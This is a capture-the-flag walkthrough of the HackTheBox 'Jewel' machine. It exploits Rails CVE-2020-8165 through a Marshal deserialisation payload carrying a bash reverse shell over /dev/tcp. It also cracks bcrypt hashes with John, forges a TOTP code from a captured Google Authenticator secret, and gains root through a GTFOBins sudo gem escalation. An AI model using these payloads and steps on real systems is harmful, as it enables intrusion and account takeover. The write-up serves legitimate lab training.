HackTheBox: (“Jewel”) — Walkthrough
Hi people :D
Today we’ll solve the “Jewel” machine from HackTheBox. It’s a good machine, but I faced some errors that forced me to take a simple hint. Let’s get started.
Enumeration
— — — — — — —
Start with Nmap (as usual XD)
When I tried to use -A with Nmap it didn’t work for some reason, so I used -A -Pn. (-Pn skips host discovery, so the port scan runs even when the host does not answer Nmap’s ping probes.)
nmap -A -Pn 10.10.10.211
Two ports are open, 8000 and 8080, and both serve HTTP.
Web Enumeration
— — — — — — — —
Let’s check port 8080 first
http://10.10.10.211:8080
We find a simple website with signup and login functions, so let’s create an account and log in with it.
Hmm, nothing interesting ☹
Let’s check port 8000
http://10.10.10.211:8000
It looks like the source code repository for Bl0G!
Click on Bl0G! > Initial commit > Gemfile
The Gemfile pins Rails to version 5.2.2.1.
After a lot of searching for an exploit, I found a CVE for it: CVE-2020-8165. Rails before 5.2.4.3 and 6.0.3.1 is affected: when the application stores a value in the cache with raw: true, the cache store deserialises it with Marshal.load on the next read, so a crafted Marshal blob written through a user-controlled field is executed as soon as the application reads it back.
After searching for a public exploit for this CVE, I found this GitHub repo.
Just follow these steps in order:
git clone https://github.com/masahiro331/CVE-2020-8165.git
bundle install --path vendor/bundle
For me, bundle install failed because the Gemfile pins ruby 2.6.3 but a different version is installed on my Kali.
To fix this, simply edit the ruby line in the Gemfile to the version you have.
Now, continue with the installation process
sudo bundle exec rails db:migrate
That completes the “Run” part of the repo’s README.
Now we move on to the exploitation process
Exploitation
— — — — — —
Again, follow the exploitation part of the GitHub repo. The only change from the repo’s example is the code line: the repo runs touch /tmp/rce, and we replace it with a reverse shell to our listener on port 4444.
bundle exec rails console
code = '`/bin/bash -c "bash >& /dev/tcp/{Your_IP}/4444 0>&1"`'
erb = ERB.allocate
erb.instance_variable_set :@src, code
erb.instance_variable_set :@filename, "1"
erb.instance_variable_set :@lineno, 1
payload = Marshal.dump(ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new erb, :result)
puts "Payload"
require 'uri'
puts URI.encode_www_form(payload: payload)
What this builds: an ERB object created with allocate (so initialize never runs) whose @src is the Ruby code that ERB#result will eval, wrapped in a deprecation proxy whose method_missing calls erb.result the first time anything calls a method on it. Marshal.dump turns that object graph into the blob the vulnerable cache store will Marshal.load.
Finally, we get the payload ☺ The last line prints it as payload=<URL-encoded blob>; the value after payload= is what we submit.
User Flag
— — — —
Now log in with your account on http://10.10.10.211:8080, then go to Profile > profile > Edit.
Click on Update User, intercept the request with Burp, and replace the value of the username parameter with the URL-encoded payload from the exploitation step.
The update fails with an error, but the malicious value has already been written to the cache. Make sure a listener is running (nc -lvnp 4444), then refresh the page: the application reads the cached entry back, Marshal.load runs the gadget, and we get a shell as bill.
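The following is an added example, not code from the writeup, from Rails, or from the PoC repo. It reproduces the shape of the CVE-2020-8165 gadget chain with two stand-in classes of my own (SourceEvaluator in place of ERB, LazyEvalProxy in place of ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy) so it runs on a plain Ruby install, and shows why the payload fires on the next read of the cache and not when it is submitted, and why the PoC needs a local Rails install to produce the blob in the first place. The eval’d string here is a harmless expression; the real payload put a backtick shell command in @src.

```ruby
# Stand-in for ERB (assumption: not the real class). ERB#result evals the
# template source it holds; here @src is eval'd directly.
class SourceEvaluator
  def result
    eval(@src)
  end
end

# Stand-in for DeprecatedInstanceVariableProxy (assumption: not the real class).
# Rails' DeprecationProxy undefines almost every method, so even #to_s lands in
# method_missing, which forwards to @instance.__send__(@method). That is the
# "trigger": the first method call on the deserialised object runs the payload.
class LazyEvalProxy
  instance_methods.each { |m| undef_method m unless /^__|^object_id$/.match?(m) }

  def initialize(instance, method)
    @instance = instance
    @method = method
  end

  def method_missing(name, *args, &block)
    @instance.__send__(@method).__send__(name, *args, &block)
  end
end

# Attacker side. Marshal.dump records the class names and instance variables of
# the object graph, which is why the PoC repo installs Rails locally: the real
# classes must exist where the blob is produced.
def build_payload(ruby_code)
  evaluator = SourceEvaluator.allocate            # allocate, never initialize; set ivars by hand as the PoC does
  evaluator.instance_variable_set(:@src, ruby_code)
  Marshal.dump(LazyEvalProxy.new(evaluator, :result))
end

# Server side, vulnerable: a cache entry stored with raw: true is Marshal.load'ed
# on read (ActiveSupport cache stores before 5.2.4.3 / 6.0.3.1).
def vulnerable_cache_read(entry)
  Marshal.load(entry)
end

# Server side, fixed: a raw entry is treated as an opaque string, never deserialised.
def fixed_cache_read(entry)
  entry.to_s
end

# Rendering the cached "username": string interpolation calls #to_s, which on
# the proxy goes to method_missing -> SourceEvaluator#result -> eval.
def render_vulnerable(entry)
  "Hello, #{vulnerable_cache_read(entry)}"
end

def render_fixed(entry)
  "Hello, #{fixed_cache_read(entry)}"
end

if __FILE__ == $0
  blob = build_payload('"computed at read time: #{6 * 7}"')   # constructed, benign payload
  puts "write: nothing happens, #{blob.bytesize} bytes stored"
  puts "read (vulnerable): #{render_vulnerable(blob)}"
  puts "read (fixed):      #{render_fixed(blob)[0, 24].inspect}..."
end
```

Nothing runs at write time, which matches the error-then-refresh behaviour on the box: the write only stores bytes, and the code executes inside whatever request first reads and renders the cached value.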
Upgrade the shell to a proper TTY:
python3 -c 'import pty; pty.spawn("/bin/bash")'
export TERM=linux
Then simply read user.txt to get the flag.
Root Flag
— — — —
Time for privilege escalation :D
Upload LinPEAS to the machine and run it.
Let the script finish, then go through the results; near the end you will see two password hashes:
$2a$12$sZac9R2VSQYjOcBTTUYy6.Zd.5I02OnmkKnD3zA6MqMrzLKz0jeDO
$2a$12$uhUssB8.HFpT4XpbhclQU.Oizufehl9qqKtmdxTXetojn2FcNncJW
Nice, now let’s crack these hashes with John. The $2a$12$ prefix marks them as bcrypt with cost 12, so expect this to be slow.
You need to gunzip /usr/share/wordlists/rockyou.txt.gz first, then put the hashes in a file and run:
john --wordlist=/usr/share/wordlists/rockyou.txt {Hashes_File}
john --show {Hashes_File}
John successfully cracks a hash and the result is spongebob (unfortunately, I didn’t take a screenshot of the result).
Try this as bill’s password (for sudo, since we already have a shell as bill).
It asks for a verification code as well; after some research I found a .google_authenticator file that contains the TOTP secret (the Base32 string on its first line).
Now we need to generate a verification code from this secret; any authenticator app or browser add-on will do.
I used the Firefox add-on called Authenticator.
To generate a code, click on the extension logo in the top right corner, then click Edit > New > Manual Entry and paste the secret.
A verification code is generated, but when you try it, it may be rejected with an error.
I went to Official Jewel Discussion and found a comment to solve this error
So, set the date and time zone of your device to match the machine’s (read them from the box with date), using these commands:
sudo timedatectl set-timezone Europe/London
sudo date --set {Machine_LocalTime}
TOTP is computed from the Unix epoch, so what actually has to agree is the absolute time, not the zone; the time zone is set first only so that the local time string copied from the machine is interpreted correctly by date --set.
Try again after these changes.
It works :D
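As an added example (not part of the writeup), here is the same verification code computed by hand in Ruby from the Base32 secret, with the clock value passed in explicitly. Instead of changing your own system time, you copy the target’s clock (the output of date +%s on the shell) into at:, which sidesteps the skew problem entirely; the window helper prints the neighbouring codes too, which is handy because libpam-google-authenticator accepts codes from a few adjacent 30-second steps (the WINDOW_SIZE line in .google_authenticator). The secret in the demo is the RFC 6238 reference secret, not the one from the box.

```ruby
require "openssl"

BASE32_ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZ234567"

# RFC 4648 Base32 decoder (Ruby's stdlib has none). .google_authenticator
# stores the shared secret in this encoding.
def base32_decode(secret)
  bits = secret.upcase.delete("= ").each_char.map { |c|
    idx = BASE32_ALPHABET.index(c)
    raise ArgumentError, "invalid base32 character #{c.inspect}" unless idx
    idx.to_s(2).rjust(5, "0")
  }.join
  [bits[0, bits.size - bits.size % 8]].pack("B*")   # drop the trailing partial byte
end

# HOTP (RFC 4226): HMAC-SHA1 over the 8-byte big-endian counter, then dynamic truncation.
def hotp(key, counter, digits: 6)
  digest = OpenSSL::HMAC.digest("SHA1", key, [counter].pack("Q>"))
  offset = digest.getbyte(-1) & 0x0f
  binary = digest[offset, 4].unpack1("N") & 0x7fffffff
  format("%0#{digits}d", binary % 10**digits)
end

# TOTP (RFC 6238): the counter is the number of 30-second steps since the Unix epoch.
# `at` is the Unix time to compute for; pass the TARGET's clock here.
def totp(secret_base32, at: Time.now.to_i, step: 30, digits: 6)
  hotp(base32_decode(secret_base32), at.to_i / step, digits: digits)
end

# Codes for the surrounding steps as well. If only the -1 or +1 code is accepted,
# the two clocks differ by roughly one step; if none is, the skew is larger than
# the PAM module's window and you need the target's epoch, not your own.
def totp_window(secret_base32, at: Time.now.to_i, step: 30, steps: 1, digits: 6)
  (-steps..steps).map { |i| [i, totp(secret_base32, at: at + i * step, step: step, digits: digits)] }.to_h
end

if __FILE__ == $0
  # Constructed input: the RFC 6238 reference secret ("12345678901234567890" in Base32).
  # Replace it with the first line of .google_authenticator from the box.
  secret = "GEZDGNBVGY3TQOJQGEZDGNBVGY3TQOJQ"
  target_epoch = Integer(ARGV[0] || Time.now.to_i)   # e.g. `date +%s` copied from the target
  totp_window(secret, at: target_epoch).each do |offset, code|
    puts "step #{offset >= 0 ? '+' : ''}#{offset}: #{code}"
  end
end
```

Run it as ruby totp.rb "$(date +%s on the target)" and type the step 0 code; the RFC 6238 test vectors (for example 94287082 for time 59 with 8 digits) are a quick way to confirm the implementation before trusting it against a real secret.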
Now we see that we can run gem as root. Go to the GTFOBins site and look up the sudo entry for gem.
We find this command (the GTFOBins entry for gem under sudo), try it, and we successfully get a root shell :D
sudo gem open -e "/bin/sh -c /bin/sh" rdoc
Simply cat root.txt and we have rooted the machine.
Thanks for reading, and I hope you enjoyed this writeup ❤